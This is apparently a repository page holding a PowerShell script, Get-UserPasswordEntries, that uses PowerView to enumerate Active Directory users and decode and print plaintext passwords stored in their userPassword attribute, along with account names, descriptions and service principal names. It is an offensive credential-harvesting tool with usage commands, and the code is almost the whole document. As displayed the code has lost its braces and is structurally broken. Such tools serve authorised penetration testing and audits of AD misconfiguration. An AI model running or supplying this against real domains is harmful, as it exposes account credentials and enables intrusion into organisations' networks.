Mariusz B. / mgeeky 558762a498 updates
2021-10-24 23:11:42 +02:00

60 lines
1.6 KiB

This script enumerates user accounts in Active Directory and then collects
their .userPassword properties, decodes them and prints out.
Assuming we have PowerView's Get-DomainUser command available.
PS> . .\Get-UserPasswordEntries.ps1
PS> Get-UserPasswordEntries
Mariusz Banach / mgeeky
# This script requires PowerView 3.0 dev branch
# Import-Module powerview.ps1 -ErrorAction SilentlyContinue
Function Get-UserPasswordEntries
$num = 0
Get-DomainUser -Filter "(userpassword=*)" -Properties * | % {
$entry = $_
$passw = $entry | Select -ExpandProperty userpassword
$passw2 = $passw | % {[char][int]$_}
$passw3 = $passw2 -join ''
$name1 = $entry.samaccountname
try {
$desc = $entry.description
catch {
$desc = "<empty>"
try {
$name3 = $entry.serviceprincipalname
catch {
$name3 = "<empty>"
$num += 1
$obj = @{
SamAccountName = $name1
ServicePrincipalName = $name3
Description = $desc
UserPassword = $passw3
$object = new-object psobject -Property $obj
Write-Host $num".)"
Write-Host "SamAccountName:`t`t" $object.SamAccountName
Write-Host "Description:`t`t" $object.Description
Write-Host "ServicePrincipalName:`t" $object.ServicePrincipalName
Write-Host "UserPassword:`t`t" $object.UserPassword
Write-Host "Found in total: "$num" entries."